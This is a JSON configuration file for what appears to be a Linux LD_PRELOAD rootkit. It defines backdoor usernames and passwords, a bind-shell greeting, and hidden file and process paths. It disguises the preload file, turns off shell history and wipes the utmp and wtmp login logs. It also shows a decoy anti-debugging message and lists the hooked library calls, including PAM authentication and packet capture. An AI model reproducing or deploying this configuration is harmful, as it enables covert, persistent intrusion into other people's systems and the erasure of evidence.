{
    "BLIND_LOGIN": "daemon",
    "BLIND_PASS": "smoker666",
    "C_ROOT": "root",
    "HIDE_F_PATH": "\/var\/lib\/libss2x\/filez",
    "HIDE_P_PATH": "\/var\/lib\/libss2x\/ipz",
    "SHELL_MSG": "Welcome!\nHere's a shell: ",
    "SHELL_PASSWD": "changeme",
    "SHELL_TYPE": "\/bin\/bash",
    "PASSPHRASE": "Hello NSA",
    "KEY_SALT": "changeme",
    "ANTI_DEBUG_MSG": "[-] Error 0x7a911401 in attaching to process!",
    "CLEANUP_LOGS": "kln",
    "LD_NORMAL": "\/etc\/ld.so.preload",
    "LD_HIDE": "\/etc\/.ld.so.preload",
    "SYS_WRITE": "write",
    "SYS_READ": "read",
    "HIST_FILE": "HISTFILE=\/dev\/null",
    "C_UNHIDE": "bin\/unhide",
    "C_LDD": "bin\/ldd",
    "PROC_NET_TCP": "\/proc\/net\/tcp",
    "PROC_NET_TCP6": "\/proc\/net\/tcp6",
    "CONFIG_FILE": "ld.so.preload",
    "PROC_PATH": "\/proc\/",
    "CMD_LINE": "%s\/cmdline",
    "ENV_LINE": "%s\/environ",
    "PROC_STR": "\/proc\/%s",
    "SCANF_LINE": "%d: %64[0-9A-Fa-f]:%X %64[0-9A-Fa-f]:%X %X %lX:%lX %X:%lX %lX %d %d %lu %512s\n",
    "LD_TRACE": "LD_TRACE_LOADED_OBJECTS",
    "LD_LINUX": "ld-linux",
    "UTMP_MSG": "utmp logs cleaned up.",
    "WTMP_MSG": "wtmp logs cleaned up.",
    "UTMP_FILE_X": "\/var\/run\/utmp",
    "WTMP_FILE_X": "\/var\/log\/wtmp",
    "HISTFILE": "HISTFILE",
    "TERM": "TERM=xterm",
    "HIDE_TERM_VAR": "ghost=1",
    "HIDE_TERM_STR": "ghosts",
    "syscall_table[SYSCALL_SIZE]": [
        "accept",
        "access",
        "execve",
        "link",
        "__lxstat",
        "__lxstat64",
        "open",
        "rmdir",
        "unlink",
        "unlinkat",
        "__xstat",
        "__xstat64",
        "fopen",
        "fopen64",
        "opendir",
        "readdir",
        "readdir64",
        "pam_authenticate",
        "pam_open_session",
        "pam_acct_mgmt",
        "getpwnam",
        "pam_sm_authenticate",
        "getpwnam_r",
        "pcap_loop"
    ]
}
